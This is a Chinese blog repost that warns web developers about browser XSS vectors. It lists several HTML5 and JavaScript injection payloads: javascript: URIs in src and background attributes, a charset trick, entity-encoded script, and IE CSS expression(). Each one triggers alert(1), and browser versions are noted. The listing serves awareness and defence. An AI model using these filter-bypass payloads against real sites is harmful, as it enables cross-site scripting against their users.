HTML 安全列表

最新推荐文章于 2023-01-02 21:27:42 发布
最新推荐文章于 2023-01-02 21:27:42 发布
阅读量591 收藏
点赞数
分类专栏: Javascript 文章标签: html javascript firefox safari opera chrome

下面这个网站罗列了,几乎所有的关于HTML 5 在各种主流浏览器上的安全问题,这些安全问题很有可能将会是黑客攻击你的网上的敲门砖,他们几乎都和Javascript都有关系,你就要好好注意了。

http://heideri.ch/jso/

下面罗列几个:

1)<table background=”javascript:alert(1)”>

IE6,7,8,9,和Opera 8.x, 9.x, 10.x 都支持这样的语法。

2)<meta charset=”mac-farsi”>¼script¾alert(1)¼/script¾

这个问题会存在于所有的Firefox版本中,可以让用户进行XSS(跨站脚本)攻击

3)<script>&amp;#x61;l&amp;#x65;rt&amp;#40;1)</script>

在<script>和<style>的TAG间,根据标据,其可以使用这样的字符来运行脚本。这在所有版本的Firefox, Opera, 和 Chrome中都会有问题。

 

4)({set/**/$($){_/**/setter=$,_=1}}).$=alert

上面这个是Firefox的一个语法,也会产生XSS攻击。

5)<div style=”font-family:foo}x=expression(write(1));”>XXX</div>

自从IE5.5后,直到IE9,IE就可以支持上面这样的语法。

6)src中是可以运行脚本的,如:

<embed src=”javascript:alert(1)”>
<img src=”javascript:alert(1)”>
<image src=”javascript:alert(1)”>
<script src=”javascript:alert(1)”>

又一个XSS攻击,几乎所有的浏览器都支持这样的方式,如:Firefox全部版本,Chrome 4.x/5.x,Opera 8.x/9.x/10.0,IE 6.0/7.0和Safari 3.x/4.x

 

还有很多,大家自己去看吧,这个网站经常更新的。总体感觉下来,IE和Firefox的安全问题都在伯仲之间,Safari貌似是问题最少的。

 

转自- 酷壳网(http://coolshell.cn/?p=2416)

《网络安全自学教程》- HTML教程
wangyuxiang946的博客
09-28 1万+
HTML语法规范,结构标签,第一个页面,字符集,基础标签,h1-h6 标题标签,p 段落标签,br 换行标签,div 标签,span 标签,img 图片标签,a 超链接标签 文本格式化标签 表格标签 列表标签 表单标签 form 表单 input 输入框 input 常用属性 HTML特殊字符对照表
wireshark网络安全分析工具之万文多图详解(持续更新)
热门推荐
herosunly的博客
03-16 8万+
1. 基本介绍 2. 下载与安装 3. 详细教程 3.1 软件界面介绍 3.1.1 菜单栏 3.1.2 工具栏 3.1.3 数据包列表区 3.1.4 数据包详细区 3.1.5 数据包字节区 3.2 Wireshark过滤器 3.2.1 捕获过滤器 3.2.2 显示过滤器 3.3 过滤规则 3.3.1 语法讲解 3.3.2 过滤实例 4. 实战案例......
《关注HTML5安全
蒋宇捷的专栏
09-09 1万+
在今天的2012中国软件开发者大会上,我做了名为《关注HTML5安全》的主题演讲。我个人认为,随着HTML5的普及和发展,HTML5的安全会成为近期带来的严重问题。之所以大家还没有感受到的原因是什么?1、目前HTML5应用还不普及 2、暂时还没有吸引攻击者的关注。        演讲摘要如下(来自CSDN专题):        -----------        我首先介绍了从HTMLHTML
SQL Server安全列表
云中客的专栏
05-11 1261
SQL Server安全列表1. 确认已经安装了NT/2000和SQL Server的最新补丁程序,不用说大家应该已经安装好了,但是我觉得最好还是在这里提醒一下。   2. 评估并且选择一个考虑到最大的安全性但是同时又不影响功能的网络协议。 多协议是明智的选择, 但是它有时不能在异种的环境中使用。  3. 给 "sa" 和 "probe" 帐户设定强壮的密码来加强其安全性。设定一个强壮
跨平台移动开发实战(十二)------HTML5安全
hyshucom
08-06 209
把应用的端扩展到mobile自然而然会带来安全的隐患,特别是对于我们基于HTML5来做跨平台的开发更是如此。HTML5提供了很多特性,各个平台都在努力的实现这些特性,开发者也努力地在使用这些特性,以此求得不一样地体验。然而,事情都有两面性,大多数web应用的安全措施都是基于传统的HTML,没有覆盖到HTML5的新特性,下面来看看由于HTML5新特性而带来的安全隐患: XSS CORS &amp...
Html安全隐患
weixin_34266504的博客
07-05 194
      最近这段时间一直在研究HTMLJavaScript安全问题,这里先整理一下Html安全隐患。 一.Html安全隐患 1.CSRF攻击【漏洞】       之前外我写过一篇《浅谈CSRF攻击方式》,如果想详细了解CSRF原理及其防御之术,可以看一下。       这里简单距个例子说明一下: 存在CSRF漏洞Html代码: &lt;form action="Transfe...
html安全知识
Zzane
12-04 301
初始化所有变量 尽管PHP不需要声明变量就可以直接使用。但为了代码的严谨还是应该初始化它。养成好习惯,不造Bug 线上的项目需要注意: display_errors 设置为off error_reporting 不论是开发还是部署环境,强烈建议将这个项目设置为 E_ALL。这样变量没有初始化会提示警告。 log_errors 项目日志,日志记录应有级别之分,不用将所有的用户操作都记录下,虽然出...
html购物订单页模板
01-11
HTML购物订单页模板是网页设计中一个至关重要的部分,它为用户提供了一个清晰、直观的界面,展示购物车中的商品信息,以及完成支付前的确认步骤。在这个模板中,通常包括了用户信息、商品详情、总价计算、支付方式...
Web程序开发:第4章 HTML列表元素.pptx
07-04
Web程序开发:第4章 HTML列表元素.pptx
HTML5和CSS3 WEB技术开发
最新发布
张晨光老师的播客
01-02 6577
B站视频参考:https://www.bilibili.com/video/BV1H44y1k7ze/[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Uwbid43Z-1672665963237)(asseits/image-20210831212039584.png)]HTML:超文本标记语言(Hyper Text Markup Language),标准通用标记语言下的一个应用。 HTML 不是一种编程语言(C、Java、python、R等),而是一种标记语言 (markup
HTML5安全 demo
02-04
HTML5安全 demo
html 第八章
08-10
学习指导:活动页的局部布局
URI, HTTP 与 HTML安全问题
09-17
介绍URI, HTTP 与 HTML的基本组成,以及各个组成部分存在的各种安全问题,最后介绍了脚本的利用 function handleResponse() { alert('this function is called from server.html') } make RPC call
java线程安全列表_java创建线程安全的集合
weixin_32200879的博客
02-13 232
List:publicstaticListdataList=Collections.synchronizedList(newArrayList());Map:publicstaticMapdataMap=newConcurrentHashMap();这里的线程安全仅仅指的是使用它自身提供的函数,如:dataList.add("数据一");dataList.remove...
【Web安全HTML5安全
RexHa的博客
10-17 1507
HTML5是互联网未来的大势所趋,随着越来越多的浏览器支持HTML5,攻击面也发生了新的变化。攻击者可以利用HTML5中的一些特性,绕过防御方案,达到攻击目的。
WEB安全HTML基础
weixin_44891093的博客
09-30 1074
WEB安全HTML基础
「第六章」HTML5安全
hacckjacking
01-22 296
「第二篇」客户端脚本安全 批注 [……] 表示他人、自己、网络批注 参考资料来源于 * 书中批注 * CSDN * GitHub * Google * 维基百科 * YouTube * MDN Web Docs ...
HTML页面安全策略汇总(1):同源策略、CORS、COOP、COEP
weixin_44384265的博客
12-02 1279
本文是HTML页面安全汇总文章第一篇:详细介绍的策略包括同源策略、跨源资源共享CORS、跨源打开程序策略COOP、跨源嵌入器策略COEP。
关于网页源代码屏蔽
weixin_34346099的博客
11-01 1647
很早就想写一篇关于网页源代码屏蔽的文章。是因为经常编出些JS脚本的之后,在沾沾自喜的同时,也在担心源代码会被人家看到,盗用我的脚本。所以一直以来,我都在尽力维护我的网页源代码的安全。虽然目前还没有找到完全安全的屏蔽方法(也就是说,这些方法在我想出来的同时,自己已经知道其弱点和破解方法了),但是,我这里有很多屏蔽的思路,来总结一下。   众所周知,要保护一个页面,最基础的就是要屏蔽右键。而现在网...
HTML安全16进制颜色代码大全与Web安全216色列表
通过这份HTML安全16进制色一览表,开发者可以方便地查找和选择合适的颜色,将其应用于网页设计、图标或其他视觉元素中。这不仅提升了页面的可读性和一致性,也为开发过程中颜色管理提供了清晰的标准。无论是在创建...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值